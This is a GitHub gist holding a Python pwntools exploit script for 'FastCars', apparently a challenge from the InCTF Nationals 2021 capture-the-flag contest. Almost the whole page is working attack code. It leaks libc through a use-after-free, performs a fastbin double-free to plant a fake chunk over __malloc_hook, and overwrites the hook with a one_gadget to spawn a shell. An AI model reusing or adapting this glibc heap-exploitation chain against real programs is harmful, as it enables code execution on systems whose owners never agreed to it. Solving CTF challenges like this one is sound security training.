-
-
Save k1R4/3eb3a27a5c449e26f3c075ba2887b1b3 to your computer and use it in GitHub Desktop.
FastCars - InCTF Nationals 2021
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
elf = ELF("./FastCars") | |
libc = ELF("./libc-2.23.so") | |
context.binary = elf | |
context.log_level = "debug" | |
p = process("./FastCars") | |
size2make = [0x0,0x18,0x68,0x1f8] | |
def alloc(size,data): | |
p.sendlineafter("> ", "1") | |
p.sendlineafter("> ", str(size2make.index(size))) | |
p.sendlineafter("Car: ", data) | |
p.recvuntil("Index: ") | |
return int(p.recv(1)) | |
def free(index): | |
p.sendlineafter("> ", "2") | |
p.sendlineafter("Index: ", str(index)) | |
def leak(index): | |
p.sendlineafter("> ", "3") | |
p.sendlineafter("Index: ", str(index)) | |
p.recvuntil("Model:\n ") | |
# Leak libc using uaf | |
a = alloc(0x1f8,"AAA") | |
b = alloc(0x18,"X") | |
free(a) | |
leak(a) | |
libc.address = unpack(p.recv(6),48) - 0x3c4b78 | |
log.info("Libc -> "+hex(libc.address)) | |
# fake chunk located above __malloc_hook to write it with one_gadget | |
fake_chunk = libc.symbols["__malloc_hook"]-0x23 | |
log.info("Fake Chunk -> "+hex(fake_chunk)) | |
# 0xf1247 execve("/bin/sh", rsp+0x70, environ) | |
# constraints: | |
# [rsp+0x70] == NULL | |
one_gadget = libc.address + 0xf1247 | |
log.info("one_gadget -> "+hex(one_gadget)) | |
# setup chunks for double free and fastbin attack | |
c = alloc(0x68,"") | |
d = alloc(0x68,"") | |
e = alloc(0x18,"") | |
# double free, avoid detection by freeing a chunk of same size in between | |
free(c) | |
free(d) | |
free(c) | |
# overwrite fd in double freed chunk to point to fake_chunk | |
f = alloc(0x68,p64(fake_chunk)) | |
g = alloc(0x68,"") | |
h = alloc(0x68,"") | |
i = alloc(0x68,"X"*0x13+p64(one_gadget)+"\x00"*0x48) # put null bytes on stack to satisfy one_gadget | |
# trigger one_gadget | |
p.sendlineafter("> ", "1") | |
p.sendlineafter("> ", "1") | |
p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment